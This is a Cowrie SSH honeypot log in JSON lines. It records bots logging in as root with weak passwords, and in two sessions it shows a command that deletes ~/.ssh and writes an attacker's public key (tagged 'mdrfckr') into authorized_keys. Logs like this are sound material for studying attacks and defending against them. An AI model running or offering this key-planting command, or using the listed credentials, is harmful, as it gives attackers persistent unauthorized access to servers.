{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":33624,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7f0e7ded1bf","protocol":"ssh","message":"New connection: 139.59.14.27:33624 (1.2.3.4:22) [session: a7f0e7ded1bf]","sensor":"my-vps","timestamp":"2025-09-08T12:55:55.717849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:55:55.718679Z","src_ip":"139.59.14.27","session":"a7f0e7ded1bf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:55:56.053360Z","src_ip":"139.59.14.27","session":"a7f0e7ded1bf"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe@123456","message":"login attempt [root/qwe@123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:55:57.440472Z","src_ip":"139.59.14.27","session":"a7f0e7ded1bf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:55:58.147622Z","src_ip":"139.59.14.27","session":"a7f0e7ded1bf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:55:58.148436Z","src_ip":"139.59.14.27","session":"a7f0e7ded1bf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:55:58.149627Z","src_ip":"139.59.14.27","session":"a7f0e7ded1bf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:55:58.485551Z","src_ip":"139.59.14.27","session":"a7f0e7ded1bf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:55:59.150937Z","src_ip":"139.59.14.27","session":"a7f0e7ded1bf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:55:59.151659Z","src_ip":"139.59.14.27","session":"a7f0e7ded1bf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:55:59.481601Z","src_ip":"139.59.14.27","session":"a7f0e7ded1bf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:55:59.482493Z","src_ip":"139.59.14.27","session":"a7f0e7ded1bf"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":33628,"dst_ip":"1.2.3.4","dst_port":22,"session":"59c8753c8599","protocol":"ssh","message":"New connection: 139.59.14.27:33628 (1.2.3.4:22) [session: 59c8753c8599]","sensor":"my-vps","timestamp":"2025-09-08T12:55:59.809470Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:55:59.810375Z","src_ip":"139.59.14.27","session":"59c8753c8599"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:56:00.147426Z","src_ip":"139.59.14.27","session":"59c8753c8599"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:56:01.526117Z","src_ip":"139.59.14.27","session":"59c8753c8599"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:56:02.862155Z","src_ip":"139.59.14.27","session":"59c8753c8599"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":49874,"dst_ip":"1.2.3.4","dst_port":22,"session":"beeb8e46477f","protocol":"ssh","message":"New connection: 139.59.14.27:49874 (1.2.3.4:22) [session: beeb8e46477f]","sensor":"my-vps","timestamp":"2025-09-08T12:56:04.176645Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:56:04.177704Z","src_ip":"139.59.14.27","session":"beeb8e46477f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:56:04.502278Z","src_ip":"139.59.14.27","session":"beeb8e46477f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:56:05.824123Z","src_ip":"139.59.14.27","session":"beeb8e46477f"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:56:06.148576Z","src_ip":"139.59.14.27","session":"beeb8e46477f"}
{"eventid":"cowrie.session.closed","duration":"10.4","message":"Connection lost after 10.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:56:06.166559Z","src_ip":"139.59.14.27","session":"a7f0e7ded1bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59826,"dst_ip":"1.2.3.4","dst_port":22,"session":"a184531c5a9f","protocol":"ssh","message":"New connection: 212.227.235.229:59826 (1.2.3.4:22) [session: a184531c5a9f]","sensor":"my-vps","timestamp":"2025-09-08T12:56:10.303960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:56:10.305891Z","src_ip":"212.227.235.229","session":"a184531c5a9f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:56:10.431311Z","src_ip":"212.227.235.229","session":"a184531c5a9f"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":39930,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5fabe27ba5d","protocol":"ssh","message":"New connection: 134.199.174.250:39930 (1.2.3.4:22) [session: b5fabe27ba5d]","sensor":"my-vps","timestamp":"2025-09-08T12:56:10.691579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:56:10.811943Z","src_ip":"134.199.174.250","session":"b5fabe27ba5d"}
{"eventid":"cowrie.login.success","username":"root","password":"rooted","message":"login attempt [root/rooted] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:56:10.975702Z","src_ip":"212.227.235.229","session":"a184531c5a9f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:56:10.984149Z","src_ip":"134.199.174.250","session":"b5fabe27ba5d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:56:11.272595Z","src_ip":"212.227.235.229","session":"a184531c5a9f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:56:11.273297Z","src_ip":"212.227.235.229","session":"a184531c5a9f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:56:11.274184Z","src_ip":"212.227.235.229","session":"a184531c5a9f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:56:11.400338Z","src_ip":"212.227.235.229","session":"a184531c5a9f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:56:11.666830Z","src_ip":"212.227.235.229","session":"a184531c5a9f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:56:11.667517Z","src_ip":"212.227.235.229","session":"a184531c5a9f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:56:11.794925Z","src_ip":"212.227.235.229","session":"a184531c5a9f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:56:11.795801Z","src_ip":"212.227.235.229","session":"a184531c5a9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60502,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6ae3e90b936","protocol":"ssh","message":"New connection: 212.227.235.229:60502 (1.2.3.4:22) [session: d6ae3e90b936]","sensor":"my-vps","timestamp":"2025-09-08T12:56:11.928531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:56:11.929389Z","src_ip":"212.227.235.229","session":"d6ae3e90b936"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:56:12.059707Z","src_ip":"212.227.235.229","session":"d6ae3e90b936"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:56:12.622562Z","src_ip":"212.227.235.229","session":"d6ae3e90b936"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123","message":"login attempt [admin/123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:56:12.731985Z","src_ip":"134.199.174.250","session":"b5fabe27ba5d"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:56:13.755026Z","src_ip":"212.227.235.229","session":"d6ae3e90b936"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32986,"dst_ip":"1.2.3.4","dst_port":22,"session":"05d3cea9cc8f","protocol":"ssh","message":"New connection: 212.227.235.229:32986 (1.2.3.4:22) [session: 05d3cea9cc8f]","sensor":"my-vps","timestamp":"2025-09-08T12:56:13.886037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:56:13.886978Z","src_ip":"212.227.235.229","session":"05d3cea9cc8f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:56:14.016804Z","src_ip":"212.227.235.229","session":"05d3cea9cc8f"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:56:14.050470Z","src_ip":"134.199.174.250","session":"b5fabe27ba5d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:56:14.583231Z","src_ip":"212.227.235.229","session":"05d3cea9cc8f"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:56:14.710927Z","src_ip":"212.227.235.229","session":"a184531c5a9f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:56:14.714411Z","src_ip":"212.227.235.229","session":"05d3cea9cc8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39132,"dst_ip":"1.2.3.4","dst_port":22,"session":"84172f1dffb5","protocol":"ssh","message":"New connection: 212.227.235.229:39132 (1.2.3.4:22) [session: 84172f1dffb5]","sensor":"my-vps","timestamp":"2025-09-08T12:56:26.727044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:56:26.728384Z","src_ip":"212.227.235.229","session":"84172f1dffb5"}
